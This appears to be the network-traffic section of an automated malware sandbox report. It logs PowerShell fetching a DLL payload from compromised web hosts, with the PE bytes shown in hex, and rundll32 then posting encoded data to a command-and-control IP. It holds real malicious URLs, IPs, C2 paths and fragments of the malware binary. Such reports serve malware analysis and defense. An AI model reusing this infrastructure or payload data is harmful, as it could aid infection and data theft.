Jan 7, 2021 18:44:30.559976101 CET	13	IN	Data Raw: 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 Data Ascii: width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors
Jan 7, 2021 18:44:30.560034037 CET	14	IN	Data Raw: 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 6c 69 6e 6b 20 68 61 73 20 62 65 Data Ascii: f-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source
Jan 7, 2021 18:44:30.560090065 CET	15	IN	Data Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70 70 65 Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="
Jan 7, 2021 18:44:30.560132027 CET	16	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	209.59.139.39	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 7, 2021 18:44:30.904099941 CET	16	OUT	GET /content/5f18Q/ HTTP/1.1 Host: veterinariadrpopui.com Connection: Keep-Alive
Jan 7, 2021 18:44:31.065102100 CET	18	IN	HTTP/1.1 500 Internal Server Error Date: Thu, 07 Jan 2021 17:44:30 GMT Server: Apache Content-Length: 7309 Connection: close Content-Type: text/html Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 35 30 39 20 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 48 31 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>
Jan 7, 2021 18:44:31.065164089 CET	19	IN	Data Raw: 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a Data Ascii:
Jan 7, 2021 18:44:31.065221071 CET	20	IN	Data Raw: 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 Data Ascii:
Jan 7, 2021 18:44:31.065277100 CET	22	IN	Data Raw: 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 Data Ascii:
Jan 7, 2021 18:44:31.065336943 CET	23	IN	Data Raw: 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 Data Ascii:
Jan 7, 2021 18:44:31.065413952 CET	24	IN	Data Raw: 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49168	45.130.229.91	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 7, 2021 18:44:31.765779018 CET	25	OUT	GET /wp-content/n/ HTTP/1.1 Host: shop.elemenslide.com Connection: Keep-Alive
Jan 7, 2021 18:44:32.090152979 CET	25	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 07 Jan 2021 17:44:31 GMT Server: Apache Location: https://shop.elemenslide.com/wp-content/n/ Content-Length: 250 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 70 2e 65 6c 65 6d 65 6e 73 6c 69 64 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://shop.elemenslide.com/wp-content/n/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49171	210.86.239.69	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 7, 2021 18:44:34.306168079 CET	27	OUT	GET /wordpress/CGMC/ HTTP/1.1 Host: khanhhoahomnay.net Connection: Keep-Alive
Jan 7, 2021 18:44:34.578701019 CET	29	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Jan 2021 17:44:34 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=60 X-Powered-By: PHP/7.4.9 Set-Cookie: 5ff74882c21e8=1610041474; expires=Thu, 07-Jan-2021 17:45:34 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Thu, 07 Jan 2021 17:44:34 GMT Expires: Thu, 07 Jan 2021 17:44:34 GMT Content-Disposition: attachment; filename="lVckIxaBMeiUca.dll" Content-Transfer-Encoding: binary Data Raw: 31 64 64 31 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 1dd1MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B
Jan 7, 2021 18:44:34.578767061 CET	30	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 7, 2021 18:44:34.578810930 CET	32	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc e9 cb 10 00 00 cc cc cc cc cc cc cc cc cc cc cc e9 1b 14 00 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 57 8b 7d 08 8b 1f 8b 77 04 83 bb 84 00 00 00 00 89 75 08 0f 84 48 01 00 00 8b 9b 80 00 00 Data Ascii: USVW}wuHjS],ICw(PGuGPwGOGtE4KsutE+Mw(1
Jan 7, 2021 18:44:34.578849077 CET	33	IN	Data Raw: cc cc 55 8b ec 56 8b 75 08 85 f6 74 7c 83 7e 10 00 74 11 8b 06 8b 4e 04 8b 40 28 6a 00 6a 00 51 03 c1 ff d0 83 7e 08 00 74 3a 57 33 ff 39 7e 0c 7e 1c 8b 46 08 8b 04 b8 85 c0 74 0c ff 76 28 50 8b 46 24 ff d0 83 c4 08 47 3b 7e 0c 7c e4 8b 46 08 5f Data Ascii: UVut\|~tN@(jjQ~t:W39~~Ftv(PF$G;~\|F_thjPFthjPVjxPt^]UEHMx\|ujl3]PxDUEtztSVuWuB;r]+rr
Jan 7, 2021 18:44:34.578888893 CET	34	IN	Data Raw: 08 00 8b 9b a0 00 00 00 03 d9 89 5d 08 8b 03 85 c0 74 65 56 57 8d 49 00 03 c1 8d 7b 04 89 45 fc 8b 07 83 e8 08 33 f6 8d 53 08 a9 fe ff ff ff 76 3a 8b 5d fc 8d 64 24 00 0f b7 02 8b c8 81 e1 00 f0 00 00 81 f9 00 30 00 00 75 0b 8b 4d 0c 25 ff 0f 00 Data Ascii: ]teVWI{E3Sv:]d$0uM%F;r]M]u_^[]UUtEVu+@Ju^]VF8FLNtQPFNtQPF
Jan 7, 2021 18:44:34.578948021 CET	36	IN	Data Raw: cd 00 00 00 8d 5f 10 53 68 c0 d4 00 10 6a 01 6a 00 68 b0 d4 00 10 ff 15 c0 d1 00 10 85 c0 0f 88 b2 00 00 00 8b 0b 0f 57 c0 66 0f d6 45 f0 b8 0d 00 00 00 66 89 45 f0 8b 45 0c 66 0f d6 45 f8 f3 0f 7e 45 f0 89 45 f8 8d 45 08 50 83 ec 10 8b c4 c7 45 Data Ascii: _ShjjhWfEfEEfE~EEEPEf~EQf@u=f}u6O=x-UOQhRxEG_^[]@tQP_^[]_^[]3
Jan 7, 2021 18:44:34.578979015 CET	36	IN	Data Raw: 20 0f 00 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 10 8b 55 0c 56 57 ff 75 14 8b 7d 08 85 c0 8b 37 0f 45 d0 52 57 89 4d fc ff 96 94 00 00 00 85 c0 74 3a 8b 45 fc 8d 55 08 8b 40 18 52 ff 75 0c c7 45 08 00 00 00 00 8b 08 Data Ascii: ]UQEUVWu}7ERWMt:EU@RuEPxuuWPTMQR_^]UQS{CuFPhtE
Jan 7, 2021 18:44:34.579030037 CET	37	IN	Data Raw: 32 30 30 30 0d 0a 78 35 56 57 be 58 d3 00 10 bf 05 00 00 00 90 56 8b cb e8 c8 01 00 00 83 c6 0c 4f 75 f2 8b cb e8 1b 00 00 00 8b cb e8 74 03 00 00 8b 45 fc 5f 5e 5b 8b e5 5d c3 33 c0 5b 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 5c a1 58 21 01 10 33 c5 Data Ascii: 2000x5VWXVOutE_^[]3[]U\X!3EME@QEhPLEEVURPQ %W39}SlEUREWPQEEURhPEUWR
Jan 7, 2021 18:44:34.579071999 CET	39	IN	Data Raw: 52 50 ff 51 20 8b f0 85 f6 78 45 83 7d e4 02 75 3f 8b 43 1c 8d 55 d0 52 0f 57 c0 8d 55 e8 66 0f d6 45 d0 66 0f d6 45 d8 8b 08 52 50 ff 51 14 8b f0 85 f6 78 1b 8d 45 d0 50 8d 45 e8 50 8b cb e8 27 00 00 00 8b f0 8d 45 d0 50 ff 15 b0 d1 00 10 47 85 Data Ascii: RPQ xE}u?CURWUfEfERPQxEPEP'EPGyM_^3[]UHX!3ESVuW}hjP?hPVxPWdCRP
Jan 7, 2021 18:44:34.579128027 CET	40	IN	Data Raw: 33 f6 e8 c5 0a 00 00 83 c4 10 85 c0 78 0b 3d ff 01 00 00 77 04 75 0d eb 05 be 7a 00 07 80 33 c0 66 89 45 fa 85 f6 0f 88 84 00 00 00 ff 75 18 ff 15 a0 d0 00 10 03 c0 50 ff 75 18 8d 85 fc fb ff ff 6a 01 ff b5 f4 fb ff ff 50 53 ff 15 00 d0 00 10 8b Data Ascii: 3x=wuz3fEuPujPS~xLju=jh\|WthWuhWtjM_^3[R]UX!3EES]V
Jan 7, 2021 18:44:34.843252897 CET	42	IN	Data Raw: 8d 49 00 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 08 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 08 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 08 66 0f 7f 6f 20 8d 7f 30 7d b7 8d 76 08 eb 56 66 Data Ascii: Ifo^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}v\|ovfsvs~vf;

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49172	5.2.136.90	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 7, 2021 18:44:47.033138990 CET	228	OUT	POST /kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ HTTP/1.1 DNT: 0 Referer: 5.2.136.90/kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ Content-Type: multipart/form-data; boundary=---------------------QoJn3cDxG8j9ficgc6HWz User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 5.2.136.90 Content-Length: 8068 Connection: Keep-Alive Cache-Control: no-cache
Jan 7, 2021 18:44:47.033278942 CET	230	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 51 6f 4a 6e 33 63 44 78 47 38 6a 39 66 69 63 67 63 36 48 57 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 Data Ascii: -----------------------QoJn3cDxG8j9ficgc6HWzContent-Disposition: form-data; name="wGRQeAoRhVSVYPngKe"; filename="AFqpSYQKSWDOjgLiAo"Content-Type: application/octet-streamP"]HUoPjjTPQ/v0n?b['2cvtjl4
Jan 7, 2021 18:44:47.106178999 CET	234	OUT	Data Raw: d7 86 21 09 74 08 d9 e7 89 e0 45 72 19 6d e1 a5 95 b2 19 24 3c 0d 6f 34 b6 dd 78 cd 2e 2c 4b 83 ed 80 dc 37 8d 38 4b dd c2 dc 25 c1 34 d6 ab ac 02 c9 6b b1 3c 96 43 8a 11 7e a8 ab 16 59 06 4e b3 96 fd 8f d9 bd 97 48 3c 36 db 2d 37 2c fa 55 b5 8e Data Ascii: !tErm$<o4x.,K78K%4k<C~YNH<6-7,UyYi J@m9@Mw'KVh'gjedr{}!qERJoia)$Y!NA:!!VR?4t\|&e,D>Q_
Jan 7, 2021 18:44:47.179127932 CET	236	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 7, 2021 18:44:47.754265070 CET	238	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Jan 2021 17:44:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 35 38 34 0d 0a 72 bb cb ed 47 2e d6 a8 b1 22 09 67 d7 c6 5d 81 d5 f1 1d 88 ee e5 e9 d7 ee 5d 1f 5f 93 20 bd d1 6d 3e 7b c4 9c ed a0 ce 0a 7e ef 0d df 57 75 7e 96 12 f0 08 64 8e a3 e3 80 c4 d9 3e d2 48 c1 bc eb 74 7d b8 1c c9 e9 f6 48 26 76 83 47 1c 7c 16 4a 54 d4 7b 2b 32 ba 23 6b 71 84 48 4e 1f d7 d5 11 93 88 82 f7 b0 8c 94 1a 75 7c 13 42 1e c7 ad 5e 28 b6 9a 76 84 04 bf 8d 92 b9 60 98 1c 21 2f 35 ec c2 d8 c7 0a 49 a2 4a ba fe 04 da af 5e c8 96 b9 ec 1b c2 2c 7a cf c3 d7 5b 60 cf 00 14 c7 aa cc 6b 3a f0 2d d5 44 1d 58 fd 69 c5 95 44 19 c5 dc 8a bb 0c 81 ad 2f ce fa f9 53 33 70 a3 63 c5 9e 32 ea df 29 1e a5 08 9a c5 e4 a6 53 f8 06 d3 32 41 77 be 93 41 20 c3 ca 1c b3 a5 62 b0 d9 fc ae 3e 39 1a c0 b5 28 e4 ac 6b 6d d6 94 39 67 d5 64 c5 10 0a b5 a8 44 46 60 06 cf eb c6 1d c0 8f 02 50 04 60 bb ee 52 2f 4b 78 6c 04 a3 6d d2 e4 f1 c6 38 fc ff d1 2d b6 d4 6b 82 6d 2b fb a9 8e 7c d5 d4 e5 af 66 30 9e 0a 73 2e dc f6 8d 07 98 de e8 b5 ec 1f ad 89 eb 39 5a 9f b7 32 5b 23 d6 99 c8 70 b4 8f 9d 8a e3 53 61 87 48 66 c8 cd 3b 67 78 b4 73 90 da 01 63 91 8c c3 d2 24 d5 93 90 8d 76 77 2d bf 7e c6 7a fd 8e e3 65 b8 ab b5 84 9e 09 07 21 97 7d 45 8d f5 0a eb 03 8d fe e5 f7 ac 69 75 f2 cb de e8 6c d3 37 2b 52 13 f7 d5 90 1a ea e1 1b e7 e6 93 20 79 ec 08 19 58 2b 61 fe 13 53 59 8f 93 5c 86 4a a8 b4 fd e0 f3 6d d5 7a e2 86 48 7a 55 c4 3d c4 ab e9 96 07 39 25 8d 7c ab 32 37 63 83 8a bb fe b7 72 15 73 08 ca 00 fb 24 23 d2 ca 98 42 8f 4d 6f 4c c5 b1 c1 ac a3 a0 48 7b 9f 01 ae bf d8 92 71 da 95 e6 01 ca 18 35 2e a2 b2 ed c3 e4 d2 71 25 53 e8 08 ae 46 09 05 ac 23 83 11 1c ca b2 c7 cc 2e a0 e1 94 39 67 94 5c 45 7e 90 be 4f 10 ad f6 f1 ed 1b 80 15 42 48 ec 35 b4 1a 68 bd 50 13 db 9c dc 23 b3 cb 40 e2 35 4e d6 7c 21 e3 47 cb 10 c1 0b cb 85 83 d8 cf 66 b1 3c db 51 ce 98 89 05 25 74 ef 42 73 ea 06 eb 73 fa 95 7b 6b 41 5c df de a3 23 25 a9 40 57 a0 7f a7 7e f4 16 57 f5 f5 c7 aa f1 cb e6 c4 65 1e ee 85 ff 0a dd 67 32 b5 18 d0 ed f2 f3 8c fc d3 9a 17 89 76 7b c5 d4 28 30 d2 94 5e f1 61 b8 1b f1 e9 51 51 4c 73 cd bc 5e 13 42 2d 17 5a 02 b8 82 a3 95 c1 25 66 33 f8 96 0b 50 c9 b7 15 eb 3e 8a 04 7a 8b 8f b2 ec 3a df 7a 20 8d cc 35 c0 f3 7e 30 77 19 9f e1 fb 23 7a 79 99 dd 92 74 13 e0 e5 45 bb 3d 83 3f 01 4d 4a 27 d4 68 08 85 a7 57 f3 38 e1 09 f6 a4 2a c1 66 fa e1 09 b5 2e 1b 8b c6 1e f4 20 3e 52 86 5c c3 7c d2 86 0b aa 98 f3 b8 ae de 2a f0 c4 a3 23 b9 a6 f8 03 ef 06 9d c3 1c a1 ad 80 c3 5e e8 66 a7 b2 6e 76 4a 12 5b 90 20 fc e5 ed 12 a2 2f 59 b7 25 b3 a5 57 08 ae 20 6d 75 da ed 3a f1 a5 10 c0 27 05 ae 66 88 62 7c 74 7a c2 06 7e 35 c8 cd 3f 2f 96 68 ca 